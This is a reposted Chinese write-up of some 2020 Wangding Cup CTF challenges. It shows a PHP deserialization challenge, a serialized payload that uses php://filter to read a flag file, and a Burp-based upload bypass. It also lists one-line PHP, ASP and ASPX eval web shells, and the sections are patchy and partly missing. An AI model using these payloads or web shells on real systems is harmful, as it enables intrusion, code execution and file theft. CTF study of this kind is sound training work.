大佬教程收集整理的这篇文章主要介绍了2020网鼎杯大赛部分题解,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
1. boom
2. AreUserialz
没做之前不知道是反序列化,做完之后才知道,废话不说上酸菜。打开之后发现是一个页面,里面包含如下内容。
<?PHP
include("flag.PHP");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
private function write() {
if(isset($this->fileName) && isset($this->content)) {
if(strlen((String)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->fileName)) {
$res = file_get_contents($this->fileName);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
}
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{'str'})) {
$str = (String)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}
}
我们先分析一下代码
?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:62:"PHP://filter/convert.base64-encode/resource=/web/html/flag.PHP";s:7:"content";N;}
提示此payload不是唯一。
然后我们在目标IP后跟payload,就可以得到一串数字。
PDAnID0gImZsYWd7NGVhM2U3YzQtXXXXXXXXXXXXXXXXX==
通过经验知道是base64加密,所以我们解码就可以得到flag。
不管他妈的是什么,给我疯狂burp。截取上传的数据包,对filename参数使用数组绕过,上传PHP.PHP,同时得到PHP.PHP路径。
PHP一句话木马:<?PHP @eval($_POST['key']);?>
ASP一句话木马:<%eval request['key']%>
ASPX一句话木马:<%@ Page Language="Jscript"%><%eval(request.Item["key"],"unsafe");%>
以上是大佬教程为你收集整理的2020网鼎杯大赛部分题解全部内容,希望文章能够帮你解决2020网鼎杯大赛部分题解所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。